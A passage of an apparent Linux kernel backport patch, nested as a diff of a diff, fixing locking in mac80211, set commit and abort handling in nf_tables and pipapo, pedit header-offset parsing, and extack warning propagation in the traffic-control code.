++	res = ieee80211_vif_set_links(sdata, wdev->valid_links);
++	mutex_unlock(&sdata->local->mtx);
++
++	return res;
+ }
+ 
+ static void ieee80211_del_intf_link(struct wiphy *wiphy,
+@@ -4745,7 +4750,9 @@ static void ieee80211_del_intf_link(struct wiphy *wiphy,
+ {
+ 	struct ieee80211_sub_if_data *sdata = IEEE80211_WDEV_TO_SUB_IF(wdev);
+ 
++	mutex_lock(&sdata->local->mtx);
+ 	ieee80211_vif_set_links(sdata, wdev->valid_links);
++	mutex_unlock(&sdata->local->mtx);
+ }
+ 
+ static int sta_add_link_station(struct ieee80211_local *local,
+diff --git a/net/mac80211/link.c b/net/mac80211/link.c
+index a1b3031fefce2..a85b44c1bc995 100644
+--- a/net/mac80211/link.c
++++ b/net/mac80211/link.c
+@@ -2,7 +2,7 @@
+ /*
+  * MLO link handling
+  *
+- * Copyright (C) 2022 Intel Corporation
++ * Copyright (C) 2022-2023 Intel Corporation
+  */
+ #include <linux/slab.h>
+ #include <linux/kernel.h>
+@@ -387,6 +387,7 @@ static int _ieee80211_set_active_links(struct ieee80211_sub_if_data *sdata,
+ 						 IEEE80211_CHANCTX_SHARED);
+ 		WARN_ON_ONCE(ret);
+ 
++		ieee80211_mgd_set_link_qos_params(link);
+ 		ieee80211_link_info_change_notify(sdata, link,
+ 						  BSS_CHANGED_ERP_CTS_PROT |
+ 						  BSS_CHANGED_ERP_PREAMBLE |
+@@ -401,7 +402,6 @@ static int _ieee80211_set_active_links(struct ieee80211_sub_if_data *sdata,
+ 						  BSS_CHANGED_TWT |
+ 						  BSS_CHANGED_HE_OBSS_PD |
+ 						  BSS_CHANGED_HE_BSS_COLOR);
+-		ieee80211_mgd_set_link_qos_params(link);
+ 	}
+ 
+ 	old_active = sdata->vif.active_links;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 437891cb8c417..13d4913266b4d 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3669,7 +3669,8 @@ err_destroy_flow_rule:
+ 	if (flow)
+ 		nft_flow_rule_destroy(flow);
+ err_release_rule:
+-	nf_tables_rule_release(&ctx, rule);
++	nft_rule_expr_deactivate(&ctx, rule, NFT_TRANS_PREPARE);
++	nf_tables_rule_destroy(&ctx, rule);
+ err_release_expr:
+ 	for (i = 0; i < n; i++) {
+ 		if (expr_info[i].ops) {
+@@ -4730,6 +4731,7 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 	set->num_exprs = num_exprs;
+ 	set->handle = nf_tables_alloc_handle(table);
++	INIT_LIST_HEAD(&set->pending_update);
+ 
+ 	err = nft_trans_set_add(&ctx, NFT_MSG_NEWSET, set);
+ 	if (err < 0)
+@@ -8992,10 +8994,25 @@ static void nf_tables_commit_audit_log(struct list_head *adl, u32 generation)
+ 	}
+ }
+ 
++static void nft_set_commit_update(struct list_head *set_update_list)
++{
++	struct nft_set *set, *next;
++
++	list_for_each_entry_safe(set, next, set_update_list, pending_update) {
++		list_del_init(&set->pending_update);
++
++		if (!set->ops->commit)
++			continue;
++
++		set->ops->commit(set);
++	}
++}
++
+ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 	struct nft_trans *trans, *next;
++	LIST_HEAD(set_update_list);
+ 	struct nft_trans_elem *te;
+ 	struct nft_chain *chain;
+ 	struct nft_table *table;
+@@ -9154,6 +9171,11 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 			nf_tables_setelem_notify(&trans->ctx, te->set,
+ 						 &te->elem,
+ 						 NFT_MSG_NEWSETELEM);
++			if (te->set->ops->commit &&
++			    list_empty(&te->set->pending_update)) {
++				list_add_tail(&te->set->pending_update,
++					      &set_update_list);
++			}
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_DELSETELEM:
+@@ -9167,6 +9189,11 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 				atomic_dec(&te->set->nelems);
+ 				te->set->ndeact--;
+ 			}
++			if (te->set->ops->commit &&
++			    list_empty(&te->set->pending_update)) {
++				list_add_tail(&te->set->pending_update,
++					      &set_update_list);
++			}
+ 			break;
+ 		case NFT_MSG_NEWOBJ:
+ 			if (nft_trans_obj_update(trans)) {
+@@ -9227,6 +9254,8 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 		}
+ 	}
+ 
++	nft_set_commit_update(&set_update_list);
++
+ 	nft_commit_notify(net, NETLINK_CB(skb).portid);
+ 	nf_tables_gen_notify(net, skb, NFT_MSG_NEWGEN);
+ 	nf_tables_commit_audit_log(&adl, nft_net->base_seq);
+@@ -9283,10 +9312,25 @@ static void nf_tables_abort_release(struct nft_trans *trans)
+ 	kfree(trans);
+ }
+ 
++static void nft_set_abort_update(struct list_head *set_update_list)
++{
++	struct nft_set *set, *next;
++
++	list_for_each_entry_safe(set, next, set_update_list, pending_update) {
++		list_del_init(&set->pending_update);
++
++		if (!set->ops->abort)
++			continue;
++
++		set->ops->abort(set);
++	}
++}
++
+ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 	struct nft_trans *trans, *next;
++	LIST_HEAD(set_update_list);
+ 	struct nft_trans_elem *te;
+ 
+ 	if (action == NFNL_ABORT_VALIDATE &&
+@@ -9384,6 +9428,12 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			nft_setelem_remove(net, te->set, &te->elem);
+ 			if (!nft_setelem_is_catchall(te->set, &te->elem))
+ 				atomic_dec(&te->set->nelems);
++
++			if (te->set->ops->abort &&
++			    list_empty(&te->set->pending_update)) {
++				list_add_tail(&te->set->pending_update,
++					      &set_update_list);
++			}
+ 			break;
+ 		case NFT_MSG_DELSETELEM:
+ 			te = (struct nft_trans_elem *)trans->data;
+@@ -9393,6 +9443,11 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			if (!nft_setelem_is_catchall(te->set, &te->elem))
+ 				te->set->ndeact--;
+ 
++			if (te->set->ops->abort &&
++			    list_empty(&te->set->pending_update)) {
++				list_add_tail(&te->set->pending_update,
++					      &set_update_list);
++			}
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_NEWOBJ:
+@@ -9433,6 +9488,8 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 		}
+ 	}
+ 
++	nft_set_abort_update(&set_update_list);
++
+ 	synchronize_rcu();
+ 
+ 	list_for_each_entry_safe_reverse(trans, next,
+diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
+index ae7146475d17a..c9fbe0f707b5f 100644
+--- a/net/netfilter/nfnetlink.c
++++ b/net/netfilter/nfnetlink.c
+@@ -533,7 +533,8 @@ ack:
+ 			 * processed, this avoids that the same error is
+ 			 * reported several times when replaying the batch.
+ 			 */
+-			if (nfnl_err_add(&err_list, nlh, err, &extack) < 0) {
++			if (err == -ENOMEM ||
++			    nfnl_err_add(&err_list, nlh, err, &extack) < 0) {
+ 				/* We failed to enqueue an error, reset the
+ 				 * list of errors and send OOM to userspace
+ 				 * pointing to the batch header.
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 06d46d1826347..15e451dc3fc46 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -1600,17 +1600,10 @@ static void pipapo_free_fields(struct nft_pipapo_match *m)
+ 	}
+ }
+ 
+-/**
+- * pipapo_reclaim_match - RCU callback to free fields from old matching data
+- * @rcu:	RCU head
+- */
+-static void pipapo_reclaim_match(struct rcu_head *rcu)
++static void pipapo_free_match(struct nft_pipapo_match *m)
+ {
+-	struct nft_pipapo_match *m;
+ 	int i;
+ 
+-	m = container_of(rcu, struct nft_pipapo_match, rcu);
+-
+ 	for_each_possible_cpu(i)
+ 		kfree(*per_cpu_ptr(m->scratch, i));
+ 
+@@ -1625,7 +1618,19 @@ static void pipapo_reclaim_match(struct rcu_head *rcu)
+ }
+ 
+ /**
+- * pipapo_commit() - Replace lookup data with current working copy
++ * pipapo_reclaim_match - RCU callback to free fields from old matching data
++ * @rcu:	RCU head
++ */
++static void pipapo_reclaim_match(struct rcu_head *rcu)
++{
++	struct nft_pipapo_match *m;
++
++	m = container_of(rcu, struct nft_pipapo_match, rcu);
++	pipapo_free_match(m);
++}
++
++/**
++ * nft_pipapo_commit() - Replace lookup data with current working copy
+  * @set:	nftables API set representation
+  *
+  * While at it, check if we should perform garbage collection on the working
+@@ -1635,7 +1640,7 @@ static void pipapo_reclaim_match(struct rcu_head *rcu)
+  * We also need to create a new working copy for subsequent insertions and
+  * deletions.
+  */
+-static void pipapo_commit(const struct nft_set *set)
++static void nft_pipapo_commit(const struct nft_set *set)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct nft_pipapo_match *new_clone, *old;
+@@ -1660,6 +1665,26 @@ static void pipapo_commit(const struct nft_set *set)
+ 	priv->clone = new_clone;
+ }
+ 
++static void nft_pipapo_abort(const struct nft_set *set)
++{
++	struct nft_pipapo *priv = nft_set_priv(set);
++	struct nft_pipapo_match *new_clone, *m;
++
++	if (!priv->dirty)
++		return;
++
++	m = rcu_dereference(priv->match);
++
++	new_clone = pipapo_clone(m);
++	if (IS_ERR(new_clone))
++		return;
++
++	priv->dirty = false;
++
++	pipapo_free_match(priv->clone);
++	priv->clone = new_clone;
++}
++
+ /**
+  * nft_pipapo_activate() - Mark element reference as active given key, commit
+  * @net:	Network namespace
+@@ -1667,8 +1692,7 @@ static void pipapo_commit(const struct nft_set *set)
+  * @elem:	nftables API element representation containing key data
+  *
+  * On insertion, elements are added to a copy of the matching data currently
+- * in use for lookups, and not directly inserted into current lookup data, so
+- * we'll take care of that by calling pipapo_commit() here. Both
++ * in use for lookups, and not directly inserted into current lookup data. Both
+  * nft_pipapo_insert() and nft_pipapo_activate() are called once for each
+  * element, hence we can't purpose either one as a real commit operation.
+  */
+@@ -1684,8 +1708,6 @@ static void nft_pipapo_activate(const struct net *net,
+ 
+ 	nft_set_elem_change_active(net, set, &e->ext);
+ 	nft_set_elem_clear_busy(&e->ext);
+-
+-	pipapo_commit(set);
+ }
+ 
+ /**
+@@ -1931,7 +1953,6 @@ static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+ 		if (i == m->field_count) {
+ 			priv->dirty = true;
+ 			pipapo_drop(m, rulemap);
+-			pipapo_commit(set);
+ 			return;
+ 		}
+ 
+@@ -2230,6 +2251,8 @@ const struct nft_set_type nft_set_pipapo_type = {
+ 		.init		= nft_pipapo_init,
+ 		.destroy	= nft_pipapo_destroy,
+ 		.gc_init	= nft_pipapo_gc_init,
++		.commit		= nft_pipapo_commit,
++		.abort		= nft_pipapo_abort,
+ 		.elemsize	= offsetof(struct nft_pipapo_elem, ext),
+ 	},
+ };
+@@ -2252,6 +2275,8 @@ const struct nft_set_type nft_set_pipapo_avx2_type = {
+ 		.init		= nft_pipapo_init,
+ 		.destroy	= nft_pipapo_destroy,
+ 		.gc_init	= nft_pipapo_gc_init,
++		.commit		= nft_pipapo_commit,
++		.abort		= nft_pipapo_abort,
+ 		.elemsize	= offsetof(struct nft_pipapo_elem, ext),
+ 	},
+ };
+diff --git a/net/sched/act_api.c b/net/sched/act_api.c
+index 9b31a10cc6399..b33f88e50aa90 100644
+--- a/net/sched/act_api.c
++++ b/net/sched/act_api.c
+@@ -1581,7 +1581,7 @@ errout:
+ 
+ static int tca_get_fill(struct sk_buff *skb, struct tc_action *actions[],
+ 			u32 portid, u32 seq, u16 flags, int event, int bind,
+-			int ref)
++			int ref, struct netlink_ext_ack *extack)
+ {
+ 	struct tcamsg *t;
+ 	struct nlmsghdr *nlh;
+@@ -1596,6 +1596,10 @@ static int tca_get_fill(struct sk_buff *skb, struct tc_action *actions[],
+ 	t->tca__pad1 = 0;
+ 	t->tca__pad2 = 0;
+ 
++	if (extack && extack->_msg &&
++	    nla_put_string(skb, TCA_ROOT_EXT_WARN_MSG, extack->_msg))
++		goto out_nlmsg_trim;
++
+ 	nest = nla_nest_start_noflag(skb, TCA_ACT_TAB);
+ 	if (!nest)
+ 		goto out_nlmsg_trim;
+@@ -1606,6 +1610,7 @@ static int tca_get_fill(struct sk_buff *skb, struct tc_action *actions[],
+ 	nla_nest_end(skb, nest);
+ 
+ 	nlh->nlmsg_len = skb_tail_pointer(skb) - b;
++
+ 	return skb->len;
+ 
+ out_nlmsg_trim:
+@@ -1624,7 +1629,7 @@ tcf_get_notify(struct net *net, u32 portid, struct nlmsghdr *n,
+ 	if (!skb)
+ 		return -ENOBUFS;
+ 	if (tca_get_fill(skb, actions, portid, n->nlmsg_seq, 0, event,
+-			 0, 1) <= 0) {
++			 0, 1, NULL) <= 0) {
+ 		NL_SET_ERR_MSG(extack, "Failed to fill netlink attributes while adding TC action");
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+@@ -1798,7 +1803,7 @@ tcf_reoffload_del_notify(struct net *net, struct tc_action *action)
+ 	if (!skb)
+ 		return -ENOBUFS;
+ 
+-	if (tca_get_fill(skb, actions, 0, 0, 0, RTM_DELACTION, 0, 1) <= 0) {
++	if (tca_get_fill(skb, actions, 0, 0, 0, RTM_DELACTION, 0, 1, NULL) <= 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -1885,7 +1890,7 @@ tcf_del_notify(struct net *net, struct nlmsghdr *n, struct tc_action *actions[],
+ 		return -ENOBUFS;
+ 
+ 	if (tca_get_fill(skb, actions, portid, n->nlmsg_seq, 0, RTM_DELACTION,
+-			 0, 2) <= 0) {
++			 0, 2, extack) <= 0) {
+ 		NL_SET_ERR_MSG(extack, "Failed to fill netlink TC action attributes");
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+@@ -1964,7 +1969,7 @@ tcf_add_notify(struct net *net, struct nlmsghdr *n, struct tc_action *actions[],
+ 		return -ENOBUFS;
+ 
+ 	if (tca_get_fill(skb, actions, portid, n->nlmsg_seq, n->nlmsg_flags,
+-			 RTM_NEWACTION, 0, 0) <= 0) {
++			 RTM_NEWACTION, 0, 0, extack) <= 0) {
+ 		NL_SET_ERR_MSG(extack, "Failed to fill netlink attributes while adding TC action");
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+diff --git a/net/sched/act_pedit.c b/net/sched/act_pedit.c
+index 238759c3192e8..180669aa9d097 100644
+--- a/net/sched/act_pedit.c
++++ b/net/sched/act_pedit.c
+@@ -13,7 +13,10 @@
+ #include <linux/rtnetlink.h>
+ #include <linux/module.h>
+ #include <linux/init.h>
++#include <linux/ip.h>
++#include <linux/ipv6.h>
+ #include <linux/slab.h>
++#include <net/ipv6.h>
+ #include <net/netlink.h>
+ #include <net/pkt_sched.h>
+ #include <linux/tc_act/tc_pedit.h>
+@@ -312,11 +315,35 @@ static bool offset_valid(struct sk_buff *skb, int offset)
+ 	return true;
+ }
+ 
+-static int pedit_skb_hdr_offset(struct sk_buff *skb,
+-				enum pedit_header_type htype, int *hoffset)
++static int pedit_l4_skb_offset(struct sk_buff *skb, int *hoffset, const int header_type)
+ {
++	const int noff = skb_network_offset(skb);
+ 	int ret = -EINVAL;
++	struct iphdr _iph;
++
++	switch (skb->protocol) {
++	case htons(ETH_P_IP): {
++		const struct iphdr *iph = skb_header_pointer(skb, noff, sizeof(_iph), &_iph);
+ 
++		if (!iph)
++			goto out;
++		*hoffset = noff + iph->ihl * 4;
++		ret = 0;
++		break;
++	}
++	case htons(ETH_P_IPV6):
++		ret = ipv6_find_hdr(skb, hoffset, header_type, NULL, NULL) == header_type ? 0 : -EINVAL;
++		break;
++	}
++out:
++	return ret;
++}
++
++static int pedit_skb_hdr_offset(struct sk_buff *skb,
++				 enum pedit_header_type htype, int *hoffset)
++{
++	int ret = -EINVAL;
++	/* 'htype' is validated in the netlink parsing */
+ 	switch (htype) {
+ 	case TCA_PEDIT_KEY_EX_HDR_TYPE_ETH:
+ 		if (skb_mac_header_was_set(skb)) {
+@@ -331,25 +358,26 @@ static int pedit_skb_hdr_offset(struct sk_buff *skb,
+ 		ret = 0;
+ 		break;
+ 	case TCA_PEDIT_KEY_EX_HDR_TYPE_TCP:
++		ret = pedit_l4_skb_offset(skb, hoffset, IPPROTO_TCP);
++		break;
+ 	case TCA_PEDIT_KEY_EX_HDR_TYPE_UDP:
+-		if (skb_transport_header_was_set(skb)) {
+-			*hoffset = skb_transport_offset(skb);
+-			ret = 0;
+-		}
++		ret = pedit_l4_skb_offset(skb, hoffset, IPPROTO_UDP);
+ 		break;
+ 	default:
+-		ret = -EINVAL;
+ 		break;
+ 	}
+-
+ 	return ret;
+ }
+ 
+ static int tcf_pedit_act(struct sk_buff *skb, const struct tc_action *a,
+ 			 struct tcf_result *res)
+ {
++	enum pedit_header_type htype = TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
++	enum pedit_cmd cmd = TCA_PEDIT_KEY_EX_CMD_SET;
+ 	struct tcf_pedit *p = to_pedit(a);
++	struct tcf_pedit_key_ex *tkey_ex;
+ 	struct tcf_pedit_parms *parms;
++	struct tc_pedit_key *tkey;
+ 	u32 max_offset;
+ 	int i;
+ 
+@@ -365,88 +393,80 @@ static int tcf_pedit_act(struct sk_buff *skb, const struct tc_action *a,
+ 	tcf_lastuse_update(&p->tcf_tm);
+ 	tcf_action_update_bstats(&p->common, skb);
+ 
+-	if (parms->tcfp_nkeys > 0) {
+-		struct tc_pedit_key *tkey = parms->tcfp_keys;
+-		struct tcf_pedit_key_ex *tkey_ex = parms->tcfp_keys_ex;
+-		enum pedit_header_type htype =
+-			TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
+-		enum pedit_cmd cmd = TCA_PEDIT_KEY_EX_CMD_SET;
+-
+-		for (i = parms->tcfp_nkeys; i > 0; i--, tkey++) {
+-			u32 *ptr, hdata;
+-			int offset = tkey->off;
+-			int hoffset;
+-			u32 val;
+-			int rc;
+-
+-			if (tkey_ex) {
+-				htype = tkey_ex->htype;
+-				cmd = tkey_ex->cmd;
+-
+-				tkey_ex++;
+-			}
++	tkey = parms->tcfp_keys;
++	tkey_ex = parms->tcfp_keys_ex;
+ 
+-			rc = pedit_skb_hdr_offset(skb, htype, &hoffset);
+-			if (rc) {
+-				pr_info("tc action pedit bad header type specified (0x%x)\n",
+-					htype);
+-				goto bad;
+-			}
++	for (i = parms->tcfp_nkeys; i > 0; i--, tkey++) {
++		int offset = tkey->off;
++		int hoffset = 0;
++		u32 *ptr, hdata;
++		u32 val;
++		int rc;
+ 
+-			if (tkey->offmask) {
+-				u8 *d, _d;
+-
+-				if (!offset_valid(skb, hoffset + tkey->at)) {
+-					pr_info("tc action pedit 'at' offset %d out of bounds\n",
+-						hoffset + tkey->at);
+-					goto bad;
+-				}
+-				d = skb_header_pointer(skb, hoffset + tkey->at,
+-						       sizeof(_d), &_d);
+-				if (!d)
+-					goto bad;
+-				offset += (*d & tkey->offmask) >> tkey->shift;
+-			}
++		if (tkey_ex) {
++			htype = tkey_ex->htype;
++			cmd = tkey_ex->cmd;
+ 
+-			if (offset % 4) {
+-				pr_info("tc action pedit offset must be on 32 bit boundaries\n");
+-				goto bad;
+-			}
++			tkey_ex++;
++		}
+ 
+-			if (!offset_valid(skb, hoffset + offset)) {
+-				pr_info("tc action pedit offset %d out of bounds\n",
+-					hoffset + offset);
+-				goto bad;
+-			}
++		rc = pedit_skb_hdr_offset(skb, htype, &hoffset);
++		if (rc) {
++			pr_info_ratelimited("tc action pedit unable to extract header offset for header type (0x%x)\n", htype);
++			goto bad;
++		}
+ 
+-			ptr = skb_header_pointer(skb, hoffset + offset,
+-						 sizeof(hdata), &hdata);
+-			if (!ptr)
+-				goto bad;
+-			/* just do it, baby */
+-			switch (cmd) {
+-			case TCA_PEDIT_KEY_EX_CMD_SET:
+-				val = tkey->val;
+-				break;
+-			case TCA_PEDIT_KEY_EX_CMD_ADD:
+-				val = (*ptr + tkey->val) & ~tkey->mask;
+-				break;
+-			default:
+-				pr_info("tc action pedit bad command (%d)\n",
+-					cmd);
++		if (tkey->offmask) {
++			u8 *d, _d;
++
++			if (!offset_valid(skb, hoffset + tkey->at)) {
++				pr_info("tc action pedit 'at' offset %d out of bounds\n",
++					hoffset + tkey->at);
+ 				goto bad;
+ 			}
++			d = skb_header_pointer(skb, hoffset + tkey->at,
++					       sizeof(_d), &_d);
++			if (!d)
++				goto bad;
++			offset += (*d & tkey->offmask) >> tkey->shift;
++		}
+ 
+-			*ptr = ((*ptr & tkey->mask) ^ val);
+-			if (ptr == &hdata)
+-				skb_store_bits(skb, hoffset + offset, ptr, 4);
++		if (offset % 4) {
++			pr_info("tc action pedit offset must be on 32 bit boundaries\n");
++			goto bad;
+ 		}
+ 
+-		goto done;
+-	} else {
+-		WARN(1, "pedit BUG: index %d\n", p->tcf_index);
++		if (!offset_valid(skb, hoffset + offset)) {
++			pr_info("tc action pedit offset %d out of bounds\n",
++				hoffset + offset);
++			goto bad;
++		}
++
++		ptr = skb_header_pointer(skb, hoffset + offset,
++					 sizeof(hdata), &hdata);
++		if (!ptr)
++			goto bad;
++		/* just do it, baby */
++		switch (cmd) {
++		case TCA_PEDIT_KEY_EX_CMD_SET:
++			val = tkey->val;
++			break;
++		case TCA_PEDIT_KEY_EX_CMD_ADD:
++			val = (*ptr + tkey->val) & ~tkey->mask;
++			break;
++		default:
++			pr_info("tc action pedit bad command (%d)\n",
++				cmd);
++			goto bad;
++		}
++
++		*ptr = ((*ptr & tkey->mask) ^ val);
++		if (ptr == &hdata)
++			skb_store_bits(skb, hoffset + offset, ptr, 4);
+ 	}
+ 
++	goto done;
++
+ bad:
+ 	spin_lock(&p->tcf_lock);
+ 	p->tcf_qstats.overlimits++;
+diff --git a/net/sched/cls_api.c b/net/sched/cls_api.c
+index abaf75300497d..445ab1b0537da 100644
+--- a/net/sched/cls_api.c
++++ b/net/sched/cls_api.c
+@@ -485,7 +485,8 @@ static struct tcf_chain *tcf_chain_lookup_rcu(const struct tcf_block *block,
+ #endif
+ 
+ static int tc_chain_notify(struct tcf_chain *chain, struct sk_buff *oskb,
+-			   u32 seq, u16 flags, int event, bool unicast);
++			   u32 seq, u16 flags, int event, bool unicast,
++			   struct netlink_ext_ack *extack);
+ 
+ static struct tcf_chain *__tcf_chain_get(struct tcf_block *block,
+ 					 u32 chain_index, bool create,
+@@ -518,7 +519,7 @@ static struct tcf_chain *__tcf_chain_get(struct tcf_block *block,
+ 	 */
+ 	if (is_first_reference && !by_act)
+ 		tc_chain_notify(chain, NULL, 0, NLM_F_CREATE | NLM_F_EXCL,
+-				RTM_NEWCHAIN, false);
++				RTM_NEWCHAIN, false, NULL);
+ 
+ 	return chain;
+ 
+@@ -551,8 +552,8 @@ static void __tcf_chain_put(struct tcf_chain *chain, bool by_act,
+ {
+ 	struct tcf_block *block = chain->block;
+ 	const struct tcf_proto_ops *tmplt_ops;
++	unsigned int refcnt, non_act_refcnt;
+ 	bool free_block = false;
+-	unsigned int refcnt;
+ 	void *tmplt_priv;
+ 
+ 	mutex_lock(&block->lock);
+@@ -572,13 +573,15 @@ static void __tcf_chain_put(struct tcf_chain *chain, bool by_act,
+ 	 * save these to temporary variables.
+ 	 */
+ 	refcnt = --chain->refcnt;
++	non_act_refcnt = refcnt - chain->action_refcnt;
+ 	tmplt_ops = chain->tmplt_ops;
+ 	tmplt_priv = chain->tmplt_priv;
+ 
+-	/* The last dropped non-action reference will trigger notification. */
+-	if (refcnt - chain->action_refcnt == 0 && !by_act) {
+-		tc_chain_notify_delete(tmplt_ops, tmplt_priv, chain->index,
+-				       block, NULL, 0, 0, false);
++	if (non_act_refcnt == chain->explicitly_created && !by_act) {
++		if (non_act_refcnt == 0)
++			tc_chain_notify_delete(tmplt_ops, tmplt_priv,
++					       chain->index, block, NULL, 0, 0,
++					       false);
+ 		/* Last reference to chain, no need to lock. */
+ 		chain->flushing = false;
+ 	}
+@@ -1815,7 +1818,8 @@ static int tcf_fill_node(struct net *net, struct sk_buff *skb,
+ 			 struct tcf_proto *tp, struct tcf_block *block,
+ 			 struct Qdisc *q, u32 parent, void *fh,
+ 			 u32 portid, u32 seq, u16 flags, int event,
+-			 bool terse_dump, bool rtnl_held)
++			 bool terse_dump, bool rtnl_held,
++			 struct netlink_ext_ack *extack)
+ {
+ 	struct tcmsg *tcm;
+ 	struct nlmsghdr  *nlh;
+@@ -1855,7 +1859,13 @@ static int tcf_fill_node(struct net *net, struct sk_buff *skb,
+ 		    tp->ops->dump(net, tp, fh, skb, tcm, rtnl_held) < 0)
+ 			goto nla_put_failure;
+ 	}
++
++	if (extack && extack->_msg &&
++	    nla_put_string(skb, TCA_EXT_WARN_MSG, extack->_msg))
++		goto nla_put_failure;
++
+ 	nlh->nlmsg_len = skb_tail_pointer(skb) - b;
++
+ 	return skb->len;
+ 
+ out_nlmsg_trim:
+@@ -1869,7 +1879,7 @@ static int tfilter_notify(struct net *net, struct sk_buff *oskb,
+ 			  struct nlmsghdr *n, struct tcf_proto *tp,
+ 			  struct tcf_block *block, struct Qdisc *q,
+ 			  u32 parent, void *fh, int event, bool unicast,
+-			  bool rtnl_held)
++			  bool rtnl_held, struct netlink_ext_ack *extack)
+ {
+ 	struct sk_buff *skb;
+ 	u32 portid = oskb ? NETLINK_CB(oskb).portid : 0;
+@@ -1881,7 +1891,7 @@ static int tfilter_notify(struct net *net, struct sk_buff *oskb,
+ 
+ 	if (tcf_fill_node(net, skb, tp, block, q, parent, fh, portid,
+ 			  n->nlmsg_seq, n->nlmsg_flags, event,
+-			  false, rtnl_held) <= 0) {
++			  false, rtnl_held, extack) <= 0) {
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
+@@ -1910,7 +1920,7 @@ static int tfilter_del_notify(struct net *net, struct sk_buff *oskb,
+ 
+ 	if (tcf_fill_node(net, skb, tp, block, q, parent, fh, portid,
+ 			  n->nlmsg_seq, n->nlmsg_flags, RTM_DELTFILTER,
+-			  false, rtnl_held) <= 0) {
++			  false, rtnl_held, extack) <= 0) {
+ 		NL_SET_ERR_MSG(extack, "Failed to build del event notification");
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+@@ -1936,14 +1946,15 @@ static int tfilter_del_notify(struct net *net, struct sk_buff *oskb,
+ static void tfilter_notify_chain(struct net *net, struct sk_buff *oskb,
+ 				 struct tcf_block *block, struct Qdisc *q,
+ 				 u32 parent, struct nlmsghdr *n,
+-				 struct tcf_chain *chain, int event)
++				 struct tcf_chain *chain, int event,
++				 struct netlink_ext_ack *extack)
+ {
+ 	struct tcf_proto *tp;
+ 
+ 	for (tp = tcf_get_next_proto(chain, NULL);
+ 	     tp; tp = tcf_get_next_proto(chain, tp))
+-		tfilter_notify(net, oskb, n, tp, block,
+-			       q, parent, NULL, event, false, true);
++		tfilter_notify(net, oskb, n, tp, block, q, parent, NULL,
++			       event, false, true, extack);
+ }
+ 
+ static void tfilter_put(struct tcf_proto *tp, void *fh)
+@@ -2147,7 +2158,7 @@ replay:
+ 			      flags, extack);
+ 	if (err == 0) {
+ 		tfilter_notify(net, skb, n, tp, block, q, parent, fh,
+-			       RTM_NEWTFILTER, false, rtnl_held);
++			       RTM_NEWTFILTER, false, rtnl_held, extack);
+ 		tfilter_put(tp, fh);
+ 		/* q pointer is NULL for shared blocks */
+ 		if (q)
+@@ -2275,7 +2286,7 @@ static int tc_del_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
+ 
+ 	if (prio == 0) {
+ 		tfilter_notify_chain(net, skb, block, q, parent, n,
+-				     chain, RTM_DELTFILTER);
++				     chain, RTM_DELTFILTER, extack);
+ 		tcf_chain_flush(chain, rtnl_held);
+ 		err = 0;
+ 		goto errout;
+@@ -2299,7 +2310,7 @@ static int tc_del_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
+ 
+ 		tcf_proto_put(tp, rtnl_held, NULL);
+ 		tfilter_notify(net, skb, n, tp, block, q, parent, fh,
+-			       RTM_DELTFILTER, false, rtnl_held);
++			       RTM_DELTFILTER, false, rtnl_held, extack);
+ 		err = 0;
+ 		goto errout;
+ 	}
+@@ -2443,7 +2454,7 @@ static int tc_get_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
+ 		err = -ENOENT;
+ 	} else {
+ 		err = tfilter_notify(net, skb, n, tp, block, q, parent,
+-				     fh, RTM_NEWTFILTER, true, rtnl_held);
++				     fh, RTM_NEWTFILTER, true, rtnl_held, NULL);
+ 		if (err < 0)
+ 			NL_SET_ERR_MSG(extack, "Failed to send filter notify message");
+ 	}
+@@ -2481,7 +2492,7 @@ static int tcf_node_dump(struct tcf_proto *tp, void *n, struct tcf_walker *arg)
+ 	return tcf_fill_node(net, a->skb, tp, a->block, a->q, a->parent,
+ 			     n, NETLINK_CB(a->cb->skb).portid,
+ 			     a->cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-			     RTM_NEWTFILTER, a->terse_dump, true);
++			     RTM_NEWTFILTER, a->terse_dump, true, NULL);
+ }
+ 
+ static bool tcf_chain_dump(struct tcf_chain *chain, struct Qdisc *q, u32 parent,
+@@ -2515,7 +2526,7 @@ static bool tcf_chain_dump(struct tcf_chain *chain, struct Qdisc *q, u32 parent,
+ 			if (tcf_fill_node(net, skb, tp, block, q, parent, NULL,
+ 					  NETLINK_CB(cb->skb).portid,
+ 					  cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-					  RTM_NEWTFILTER, false, true) <= 0)
++					  RTM_NEWTFILTER, false, true, NULL) <= 0)
+ 				goto errout;
